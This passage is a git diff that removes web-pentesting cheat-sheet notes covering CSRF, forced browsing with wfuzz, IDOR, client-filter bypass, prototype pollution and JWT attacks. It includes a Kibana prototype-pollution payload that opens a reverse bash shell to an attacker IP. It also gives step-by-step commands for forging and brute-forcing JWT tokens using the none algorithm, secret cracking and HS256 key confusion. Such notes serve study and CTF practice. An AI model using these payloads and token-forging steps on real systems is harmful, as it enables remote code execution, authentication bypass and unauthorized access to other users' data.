* Size
* HttpOnly, no access by client side scripts
* Secure, HTTPs only
* SameSite, cookie sent through cross-site request
* SameParty, firt party requests only
* Priority
## Response
* May look like this
```sh
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly
```

View File

@ -1,11 +0,0 @@
# CSRF
## Protection
* May be a hidden field with an encoded value
```html
<input type="hidden" name="csrf_protect" value="eyJk..n0=">
```
* This field need to be removed in order to do some csrf shenanigans
* Decode the value to reproduce some valid content.

View File

@ -1,23 +0,0 @@
# Forced Browsing
Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note.
## Usage
## Tools
### wfuzz
* `pip install wfuzz`
```
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
```
|Parameter|Detail|
|---------|------|
|-c|Shows the output in color|
|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
|--hc|Don't show certain http response codes|
|--hl|Don't show a certain amount of lines in the response|
|--hh|Don't show a certain amount of words|
|--hw|Don't show word response return val of this length|

View File

@ -1,8 +0,0 @@
# HTTP Header Injection & Cache Poisoning
## References
* [Portswigger]https://portswigger.net/web-security/host-header
* [Spring project](https://github.com/spring-projects/spring-security/issues/4310)
* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)

View File

@ -1,3 +0,0 @@
# Insecure Direct Object Reference (IDOR)
Changing URL parameters.

View File

@ -1,10 +0,0 @@
# Client Filters
* Circumvent client side filters via
* Disable javascript
* Use curl
```sh
curl -X POST -F "submit=<value>" -F "<file-parameter>=@<path-to-file>" <site>
```
* Intercept and modify incoming page via Burpsuite
* Intercept and modify upload of already loaded page via Burpsuite

View File

@ -1,31 +0,0 @@
# Prototype Pollution
* Overwrite built in properties, like constructor, toString of an object.
* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
## Usage
* Access to prototype inside object, as an example Javascript
```javascript
obj.__proto__
Object.prototype
```
* Create object
```javascript
let obj = {}
```
* Create properties inside `__proto__`.
```javascript
obj.__proto__.isAdmin = true
```
### Start Node commands
* Use
* `require`
* `eval`
### Kibana CVE 2019
* Write reverse bash into variable
```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

@ -1 +0,0 @@
Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61

View File

@ -1,88 +0,0 @@
# JSON Web Token
## Build up
```sh
header.payload.signature
```
1. **Header**: This consists of the algorithm used and the type of the token.
```sh
{ "alg": "HS256", "typ": "JWT"}
```
2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
## NONE Algorithm Vulnerability
* Example with `alg: NONE`, so no third part is needed.
```sh
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
```
* Encoded headers are as follows
* `{"type": "JWT", "alg": "none"}`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
```
* `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
```
## Brute Force
```python
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
```
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
|Parameter|Details|
|---------|-------|
|Token | The HS256 JWT Token|
|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
|max-length|Secret max length (default: 12)|
```sh
[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
Attempts: 100000
Attempts: 200000
Attempts: 300000
SECRET FOUND: pass
Time taken (sec): 11.605
Attempts: 346830
```
## HS256 Vulnerability
It is calculated by using server `K_pub`, which may be gained via content of the server cert
### Build Up
* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
```sh
$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
```
* Encoding the payload, no spaces inbetween. Cut `==` at the end.
```sh
echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ==
```
* Crafting the HMAC signature
* Convert `K_pub` file to hex
```sh
cat id_rsa.pub | xxd -p | tr -d "\\n"
```
* Sign the message to get the signature as hex value
```sh
echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
```
* Decode hex to binary data and reencode as base64 via python
```python
python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")"
```
## Tools
* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
* https://jwt.io

Some files were not shown because too many files have changed in this diff Show More